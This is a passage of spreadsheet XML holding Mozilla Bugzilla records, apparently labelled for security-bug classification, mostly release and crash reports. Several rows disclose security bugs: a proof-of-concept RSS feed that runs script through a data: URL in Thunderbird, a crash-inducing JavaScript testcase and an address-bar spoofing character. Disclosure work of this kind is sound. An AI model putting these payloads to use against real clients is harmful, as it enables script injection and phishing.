created a highlighted block of text (which I had NOT copied) and I could not get
rid of it. I saved the message as text AND as a draft. The message also included
an attachment. We I tried to
     (38222620)	Comments:  re-open the draft  the application crashed.
     (38137584)	Comments: 5th time.  Refer to theprevious ones.
     (38137508)	Comments: Same damn thing as last time.  I'm getting tired of this.  I would
like to be able to forward a message with an attachment.
     (38137394)	Comments: I pressed the forward button on Messenger on a message with a JPEG
 attachment.
     (38137353)	Comments: Type 2 error.   I was about to attach a JPEG file to an e-mail
message.
     (38136141)	Comments: forwarding a piece of mail
     (38128236)	Comments: trying to foward  mail with an attachment.
     (38126952)	Comments: Forwarding an e-mail
     (38104369)	Comments: forwarding mail with an attachment
     (37976316)	Comments: resending an email
     (37899351)	Comments: trying to open and send a email draft.
     (37883878)	Comments: tried to forward a draft email
     (37883733)	Comments: moved from sent to draft; then  tried to edit draft
     (37883239)	Comments: forwarding one email
     (37880989)	Comments: sent mail  then tried to edit it for a different address.
     (37879741)	Comments: upgraded to your latest version and tried to edit an email draft.
     (37834146)	Comments: Forwarding emails
     (37834056)	Comments: Forwarding emails
     (37830407)	Comments: Sending emails.</t>
        </is>
      </c>
      <c r="X3157" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3158">
      <c r="A3158" t="n">
        <v>453827</v>
      </c>
      <c r="B3158" t="inlineStr">
        <is>
          <t>2008-09-05 08:07:34 -0700</t>
        </is>
      </c>
      <c r="C3158" t="inlineStr">
        <is>
          <t>Mathematical Script Small k (U+1D4C2) makes the contents of a textbox invisible by scrolling the baseline out of view</t>
        </is>
      </c>
      <c r="D3158" t="inlineStr">
        <is>
          <t>2009-12-03 16:23:51 -0800</t>
        </is>
      </c>
      <c r="E3158" t="n">
        <v>1</v>
      </c>
      <c r="F3158" t="n">
        <v>1</v>
      </c>
      <c r="G3158" t="n">
        <v>3</v>
      </c>
      <c r="H3158" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3158" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3158" t="inlineStr">
        <is>
          <t>Layout: Form Controls</t>
        </is>
      </c>
      <c r="K3158" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3158" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3158" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3158" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3158" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3158" t="inlineStr">
        <is>
          <t>[sg:low] spoof</t>
        </is>
      </c>
      <c r="Q3158" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3158" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3158" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3158" t="n">
        <v>1</v>
      </c>
      <c r="U3158" t="n">
        <v>0</v>
      </c>
      <c r="V3158" t="n">
        <v>102</v>
      </c>
      <c r="W3158" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
The problem is that the address bar can display any type of character (for example: unicode). This means a problem, because there are some strange characters, with a which format generates errors as not displaying the address in the address bar.
Reproducible: Always
Steps to Reproduce:
1-Create a file and rename with a special character.
2-open it and display the address bar.
Actual Results:  
We can see that the file is open and in the address bar, a blank space.
In my opinion, should be limited capacity to interpret the format in the address bar as a possible solution.
CHARACTER IN HTML : &amp;#120000;
Lastly while not is a big problem could perhaps be used for phishing attacks.</t>
        </is>
      </c>
      <c r="X3158" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3159">
      <c r="A3159" t="n">
        <v>888858</v>
      </c>
      <c r="B3159" t="inlineStr">
        <is>
          <t>2013-07-01 03:27:56 -0700</t>
        </is>
      </c>
      <c r="C3159" t="inlineStr">
        <is>
          <t>L10n installs broken on Windows</t>
        </is>
      </c>
      <c r="D3159" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3159" t="n">
        <v>1</v>
      </c>
      <c r="F3159" t="n">
        <v>1</v>
      </c>
      <c r="G3159" t="n">
        <v>5</v>
      </c>
      <c r="H3159" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3159" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3159" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3159" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3159" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3159" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3159" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3159" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3159" t="inlineStr"/>
      <c r="Q3159" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3159" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3159" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3159" t="n">
        <v>1</v>
      </c>
      <c r="U3159" t="n">
        <v>0</v>
      </c>
      <c r="V3159" t="n">
        <v>4</v>
      </c>
      <c r="W3159" t="inlineStr">
        <is>
          <t>STR:
1) Visit http://www.mozilla.org/es-ES/firefox/new/ on Windows and download the stub installer
2) Run through the install process.
3) Notice that Firefox that is installed is in English  instead of Spanish
I tried this with FR, DE and got the same results
Expected Result:
User should be able to download and install Firefox version in their language</t>
        </is>
      </c>
      <c r="X3159" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3160">
      <c r="A3160" t="n">
        <v>1698503</v>
      </c>
      <c r="B3160" t="inlineStr">
        <is>
          <t>2021-03-15 06:04:47 -0700</t>
        </is>
      </c>
      <c r="C3160" t="inlineStr">
        <is>
          <t>Stop Alt-Svc connections to go to blocked ports, when they are written and parsed as exceeding 16 bit</t>
        </is>
      </c>
      <c r="D3160" t="inlineStr">
        <is>
          <t>2021-11-22 23:38:40 -0800</t>
        </is>
      </c>
      <c r="E3160" t="n">
        <v>1</v>
      </c>
      <c r="F3160" t="n">
        <v>1</v>
      </c>
      <c r="G3160" t="n">
        <v>3</v>
      </c>
      <c r="H3160" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3160" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3160" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3160" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3160" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3160" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3160" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3160" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3160" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main88+][adv-esr78.10+]</t>
        </is>
      </c>
      <c r="Q3160" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3160" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3160" t="inlineStr">
        <is>
          <t>88 Branch</t>
        </is>
      </c>
      <c r="T3160" t="n">
        <v>1</v>
      </c>
      <c r="U3160" t="n">
        <v>0</v>
      </c>
      <c r="V3160" t="n">
        <v>15</v>
      </c>
      <c r="W3160" t="inlineStr">
        <is>
          <t>When seeing an Alt-Svc header in `nsHttpChannel::ProcessAltService()`, we first copy it into a string and pass it into ` AltSvcMapping::ProcessHeader`, which then parses the a substring after the colon character as a port into an `int32_t`.
Unfortunately and unlike other parts of our code (I haven't checked other uses of `NS_CheckPortSafety` exhaustively), this is never being range-checked to be within the valid port ranges of int16_t.
So, despite adding a test for the AltSvc case, I have taken the liberty to modify the AllowPort function. But there are multiple ways in which we could do that..
Alternatives:
-  disallow values with bits beyond the typical size right in the utility function and return false (e.g., disallowed)
- unset the high bits (logical-and with `0xFFFF`) and let it through according to the block list
- change the function signature to expect a uint16_t
@dragana: Which of you would you prefer here? I'll attach a patch that goes with option 1, but happy to adjust.
Anecdotally, we used to have a 16-bit type with bug 95488, but a global rewrite from NSPR numeric types to stdint in bug 579517 incorrectly removed that. *lolsob*
I'll rate it as sec-low, might be sec-moderate under certain circumstances.</t>
        </is>
      </c>
      <c r="X3160" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3161">
      <c r="A3161" t="n">
        <v>470369</v>
      </c>
      <c r="B3161" t="inlineStr">
        <is>
          <t>2008-12-18 21:21:44 -0800</t>
        </is>
      </c>
      <c r="C3161" t="inlineStr">
        <is>
          <t>Add Camino 2.0b1 to bouncer</t>
        </is>
      </c>
      <c r="D3161" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3161" t="n">
        <v>1</v>
      </c>
      <c r="F3161" t="n">
        <v>1</v>
      </c>
      <c r="G3161" t="n">
        <v>5</v>
      </c>
      <c r="H3161" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3161" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3161" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3161" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3161" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3161" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3161" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3161" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3161" t="inlineStr"/>
      <c r="Q3161" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3161" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3161" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3161" t="n">
        <v>1</v>
      </c>
      <c r="U3161" t="n">
        <v>0</v>
      </c>
      <c r="V3161" t="n">
        <v>2</v>
      </c>
      <c r="W3161" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #460628 +++
We'll be releasing Camino 2.0b1 next Tuesday (23 Dec) and would like it to be added to bouncer.
Camino 2.0b1 en-US will be http://releases.mozilla.org/pub/mozilla.org/camino/releases/en-US/Camino-2.0b1.dmg .
There is no multilingual version for this release.</t>
        </is>
      </c>
      <c r="X3161" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3162">
      <c r="A3162" t="n">
        <v>754745</v>
      </c>
      <c r="B3162" t="inlineStr">
        <is>
          <t>2012-05-13 18:43:13 -0700</t>
        </is>
      </c>
      <c r="C3162" t="inlineStr">
        <is>
          <t>[Security Review] B2G Gaia - Music</t>
        </is>
      </c>
      <c r="D3162" t="inlineStr">
        <is>
          <t>2013-02-20 12:05:33 -0800</t>
        </is>
      </c>
      <c r="E3162" t="n">
        <v>1</v>
      </c>
      <c r="F3162" t="n">
        <v>1</v>
      </c>
      <c r="G3162" t="n">
        <v>5</v>
      </c>
      <c r="H3162" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3162" t="inlineStr">
        <is>
          <t>mozilla.org</t>
        </is>
      </c>
      <c r="J3162" t="inlineStr">
        <is>
          <t>Security Assurance: Review Request</t>
        </is>
      </c>
      <c r="K3162" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3162" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3162" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3162" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3162" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3162" t="inlineStr">
        <is>
          <t>[Score:44:Medium]</t>
        </is>
      </c>
      <c r="Q3162" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3162" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3162" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3162" t="n">
        <v>1</v>
      </c>
      <c r="U3162" t="n">
        <v>0</v>
      </c>
      <c r="V3162" t="n">
        <v>3</v>
      </c>
      <c r="W3162" t="inlineStr">
        <is>
          <t>Review of the gaia Music app: http://music.gaiamobile.org/</t>
        </is>
      </c>
      <c r="X3162" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3163">
      <c r="A3163" t="n">
        <v>99696</v>
      </c>
      <c r="B3163" t="inlineStr">
        <is>
          <t>2001-09-14 16:23:20 -0700</t>
        </is>
      </c>
      <c r="C3163" t="inlineStr">
        <is>
          <t>offline: trunk only: get selected messages doesn't work.</t>
        </is>
      </c>
      <c r="D3163" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E3163" t="n">
        <v>1</v>
      </c>
      <c r="F3163" t="n">
        <v>1</v>
      </c>
      <c r="G3163" t="n">
        <v>2</v>
      </c>
      <c r="H3163" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3163" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J3163" t="inlineStr">
        <is>
          <t>MailNews: Backend</t>
        </is>
      </c>
      <c r="K3163" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3163" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3163" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3163" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3163" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3163" t="inlineStr">
        <is>
          <t>PDT+</t>
        </is>
      </c>
      <c r="Q3163" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3163" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3163" t="inlineStr">
        <is>
          <t>mozilla0.9.5</t>
        </is>
      </c>
      <c r="T3163" t="n">
        <v>1</v>
      </c>
      <c r="U3163" t="n">
        <v>0</v>
      </c>
      <c r="V3163" t="n">
        <v>13</v>
      </c>
      <c r="W3163" t="inlineStr">
        <is>
          <t>Tested commercial
2001-09-14-09-trunk nt 4.0
2001-09-14-08-trunk linux 2.2, mac 9.1
David, I think this is a regression.
I noticed when I selected mesg(s) in messenger and went
to file|Offline|Get selected messages it did not download
those messages. These messages were ordinary text mesgs and
were 1kb in size. 'Get flagged messages' works fine.
I'm not sure which bug might have caused this. I did a little
regression testing on windows and linux builds.
The last trunk builds that 'get selected messages' was working
  in was the 9-12-08 on linux and 9-12-09 (2001091203) on windows.
The 9-13-08 (linux) and 9-13-05 (windows) is when 'get selected
messages' was first broken in.
I looked at any related offline bugs and the only ones that were
checked into the trunk were bug 79245 and bug 91352. I don't
think these had an affect on "get selected messages" but not sure.</t>
        </is>
      </c>
      <c r="X3163" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3164">
      <c r="A3164" t="n">
        <v>1336312</v>
      </c>
      <c r="B3164" t="inlineStr">
        <is>
          <t>2017-02-02 19:38:15 -0800</t>
        </is>
      </c>
      <c r="C3164" t="inlineStr">
        <is>
          <t>Add SeaMonkey 2.48b1 to bouncer</t>
        </is>
      </c>
      <c r="D3164" t="inlineStr">
        <is>
          <t>2017-04-11 07:32:08 -0700</t>
        </is>
      </c>
      <c r="E3164" t="n">
        <v>1</v>
      </c>
      <c r="F3164" t="n">
        <v>1</v>
      </c>
      <c r="G3164" t="n">
        <v>5</v>
      </c>
      <c r="H3164" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3164" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3164" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K3164" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3164" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3164" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3164" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3164" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3164" t="inlineStr">
        <is>
          <t>[releaseduty]</t>
        </is>
      </c>
      <c r="Q3164" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3164" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3164" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3164" t="n">
        <v>1</v>
      </c>
      <c r="U3164" t="n">
        <v>0</v>
      </c>
      <c r="V3164" t="n">
        <v>2</v>
      </c>
      <c r="W3164" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1294434 +++
The SeaMonkey team is going to release SeaMonkey 2.48b1 on TBA, and we'd like to have the main builds added to bouncer for downloads.
There is a helper script at http://hg.mozilla.org/build/braindump/file/default/releases-related/add_seamonkey_to_bouncer.sh and you can edit the vars in the file to run it where VERSION=2.48b1 and OLDVER=2.39b1, or you can manually add the relevant snippets
The relevant URLs to add are (bouncer and FTP):
?product=seamonkey-2.48b1&amp;os=win
/seamonkey/releases/2.48b1/win32/:lang/SeaMonkey%20Setup%202.48b1.exe
?product=seamonkey-2.48b1&amp;os=linux
/seamonkey/releases/2.48b1/linux-i686/:lang/seamonkey-2.48b1.tar.bz2
?product=seamonkey-2.48b1&amp;os=osx
/seamonkey/releases/2.48b1/mac/:lang/SeaMonkey%202.48b1.dmg
?product=seamonkey-2.48b1-complete&amp;os=win
/seamonkey/releases/2.48b1/update/win32/:lang/seamonkey-2.48b1.complete.mar
?product=seamonkey-2.48b1-complete&amp;os=linux
/seamonkey/releases/2.48b1/update/linux-i686/:lang/seamonkey-2.48b1.complete.mar
?product=seamonkey-2.48b1-complete&amp;os=osx
/seamonkey/releases/2.48b1/update/mac/:lang/seamonkey-2.48b1.complete.mar
product=seamonkey-2.48b1-partial-2.39b1&amp;os=win
/seamonkey/releases/2.48b1/update/win32/:lang/seamonkey-2.39b1-2.48b1.partial.mar
?product=seamonkey-2.48b1-partial-2.39b1&amp;os=linux
/seamonkey/releases/2.48b1/update/linux-i686/:lang/seamonkey-2.39b1-2.48b1.partial.mar
?product=seamonkey-2.48b1-partial-2.39b1&amp;os=osx
/seamonkey/releases/2.48b1/update/mac/:lang/seamonkey-2.39b1-2.48b1.partial.mar
For now Bouncer monitors locale `tr` which will be in this release.</t>
        </is>
      </c>
      <c r="X3164" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3165">
      <c r="A3165" t="n">
        <v>1013056</v>
      </c>
      <c r="B3165" t="inlineStr">
        <is>
          <t>2014-05-19 22:29:20 -0700</t>
        </is>
      </c>
      <c r="C3165" t="inlineStr">
        <is>
          <t>Crash at a weird memory address involving RegExp and filterPar</t>
        </is>
      </c>
      <c r="D3165" t="inlineStr">
        <is>
          <t>2016-06-04 16:02:18 -0700</t>
        </is>
      </c>
      <c r="E3165" t="n">
        <v>1</v>
      </c>
      <c r="F3165" t="n">
        <v>1</v>
      </c>
      <c r="G3165" t="n">
        <v>3</v>
      </c>
      <c r="H3165" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3165" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3165" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3165" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3165" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3165" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3165" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3165" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3165" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main31+]</t>
        </is>
      </c>
      <c r="Q3165" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3165" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3165" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T3165" t="n">
        <v>1</v>
      </c>
      <c r="U3165" t="n">
        <v>0</v>
      </c>
      <c r="V3165" t="n">
        <v>45</v>
      </c>
      <c r="W3165" t="inlineStr">
        <is>
          <t>Created attachment 8425230
stack
b = RegExp("(?=())")
y = new Object;
a = b.exec('')
a[3] = undefined
Array.prototype.unshift.call(a, undefined)
try {
    a.filterPar(function() {})
} catch (e) {}
crashes js opt shell on m-c changeset 2893f60d5903 with --ion-parallel-compile=off --ion-eager at a weird memory address intermittently.
Setting s-s and assuming sec-critical prior to further analysis, as crashing at a weird address seems bad.
My configure flags are:
CC="gcc-4.7 -mfloat-abi=softfp -B/usr/lib/gcc/arm-linux-gnueabi/4.7" CXX="g++-4.7 -mfloat-abi=softfp -B/usr/lib/gcc/arm-linux-gnueabi/4.7" AR=ar sh /home/fuzz5lin/trees/mozilla-central/js/src/configure --target=arm-linux-gnueabi --enable-optimize --disable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --disable-tests --enable-more-deterministic --with-ccache --enable-threadsafe &lt;other NSPR options&gt;
Run this anytime from 1-100 times, or (set disable-randomization if necessary) within gdb, repeatedly run it till it crashes.
I will try to see if I can get a bisection, but no promises yet.
Setting needinfo? from Marty to see what's going on here.</t>
        </is>
      </c>
      <c r="X3165" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3166">
      <c r="A3166" t="n">
        <v>1244232</v>
      </c>
      <c r="B3166" t="inlineStr">
        <is>
          <t>2016-01-29 11:14:48 -0800</t>
        </is>
      </c>
      <c r="C3166" t="inlineStr">
        <is>
          <t>Add readme to https://github.com/mozilla/oneanddone/tree/master/oneanddone/tests/functional</t>
        </is>
      </c>
      <c r="D3166" t="inlineStr">
        <is>
          <t>2018-10-15 11:06:13 -0700</t>
        </is>
      </c>
      <c r="E3166" t="n">
        <v>1</v>
      </c>
      <c r="F3166" t="n">
        <v>1</v>
      </c>
      <c r="G3166" t="n">
        <v>6</v>
      </c>
      <c r="H3166" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3166" t="inlineStr">
        <is>
          <t>Mozilla QA Graveyard</t>
        </is>
      </c>
      <c r="J3166" t="inlineStr">
        <is>
          <t>One and Done</t>
        </is>
      </c>
      <c r="K3166" t="inlineStr">
        <is>
          <t>Version 4</t>
        </is>
      </c>
      <c r="L3166" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3166" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3166" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3166" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3166" t="inlineStr"/>
      <c r="Q3166" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3166" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3166" t="inlineStr">
        <is>
          <t>Milestone 1</t>
        </is>
      </c>
      <c r="T3166" t="n">
        <v>1</v>
      </c>
      <c r="U3166" t="n">
        <v>0</v>
      </c>
      <c r="V3166" t="n">
        <v>2</v>
      </c>
      <c r="W3166" t="inlineStr">
        <is>
          <t>Bring over the old readme from oneanddone-tests and make any changes required for it to make sense in this repo.</t>
        </is>
      </c>
      <c r="X3166" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3167">
      <c r="A3167" t="n">
        <v>1411716</v>
      </c>
      <c r="B3167" t="inlineStr">
        <is>
          <t>2017-10-25 12:58:06 -0700</t>
        </is>
      </c>
      <c r="C3167" t="inlineStr">
        <is>
          <t>TBE-01-014: JavaScript Execution via RSS in mailbox:// origin</t>
        </is>
      </c>
      <c r="D3167" t="inlineStr">
        <is>
          <t>2020-02-16 17:13:26 -0800</t>
        </is>
      </c>
      <c r="E3167" t="n">
        <v>1</v>
      </c>
      <c r="F3167" t="n">
        <v>1</v>
      </c>
      <c r="G3167" t="n">
        <v>3</v>
      </c>
      <c r="H3167" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3167" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J3167" t="inlineStr">
        <is>
          <t>Feed Reader</t>
        </is>
      </c>
      <c r="K3167" t="inlineStr">
        <is>
          <t>57</t>
        </is>
      </c>
      <c r="L3167" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3167" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3167" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3167" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3167" t="inlineStr"/>
      <c r="Q3167" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3167" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3167" t="inlineStr">
        <is>
          <t>Thunderbird 58.0</t>
        </is>
      </c>
      <c r="T3167" t="n">
        <v>1</v>
      </c>
      <c r="U3167" t="n">
        <v>0</v>
      </c>
      <c r="V3167" t="n">
        <v>35</v>
      </c>
      <c r="W3167" t="inlineStr">
        <is>
          <t>In case a user views RSS feeds as a website, e.g. via “View -&gt; Feed article -&gt; Website” or in the standard format of “View -&gt; Feed article -&gt; default format”, it is possible to execute JavaScript in the parsed RSS feed.
When either one of the aforementioned two settings is in place, Thunderbird will check for the presence of a &lt;link&gt; element in a RSS item. It will then fetch and display the specified origin. The remote web page is from then on allowed to execute JavaScript like any normal web page. This is not a straightforward security issue, as the default Same Origin Policy is applied. In case where no &lt;link&gt; element is present, Thunderbird will parse the description element but will forbid JavaScript execution. A possibility to bypass the restriction was uncovered with relation to specifying a data:text/html URL for a &lt;link&gt; element. Thunderbird parses the data: URL and displays the defined HTML page, which then operates in the mailbox:// origin and is allowed to execute JavaScript:
PoC RSS Feed:
&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;rss version="2.0"&gt;
&lt;channel&gt;
&lt;title&gt;Feed1&lt;/title&gt;
&lt;link&gt;http://example.com&lt;/link&gt;
&lt;item&gt;
&lt;title&gt;Feed1&lt;/title&gt;
&lt;link&gt;data:text/html,%3ch1%3easdf%3c/h1%3e%3cscript%3ealert(123)
%3c/script%3e&lt;/link&gt;
&lt;/item&gt;
&lt;/channel&gt;
&lt;/rss&gt;
It is recommended to only allow HTTP/HTTPS URLs in &lt;link&gt; tags. This ensures that a feed can exclusively specify real remote web pages, therefore being restricted to its own origin.</t>
        </is>
      </c>
      <c r="X3167" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3168">
      <c r="A3168" t="n">
        <v>1381495</v>
      </c>
      <c r="B3168" t="inlineStr">
        <is>
          <t>2017-07-17 07:26:26 -0700</t>
        </is>
      </c>
      <c r="C3168" t="inlineStr">
        <is>
          <t>buildbot mac l10n repacks fail to run mar</t>
        </is>
      </c>
      <c r="D3168" t="inlineStr">
        <is>
          <t>2017-07-28 13:09:12 -0700</t>
        </is>
      </c>
      <c r="E3168" t="n">
        <v>1</v>
      </c>
      <c r="F3168" t="n">
        <v>1</v>
      </c>
      <c r="G3168" t="n">
        <v>5</v>
      </c>
      <c r="H3168" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3168" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3168" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K3168" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3168" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3168" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3168" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3168" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3168" t="inlineStr"/>
      <c r="Q3168" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3168" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3168" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3168" t="n">
        <v>1</v>
      </c>
      <c r="U3168" t="n">
        <v>0</v>
      </c>
      <c r="V3168" t="n">
        <v>18</v>
      </c>
      <c r="W3168" t="inlineStr">
        <is>
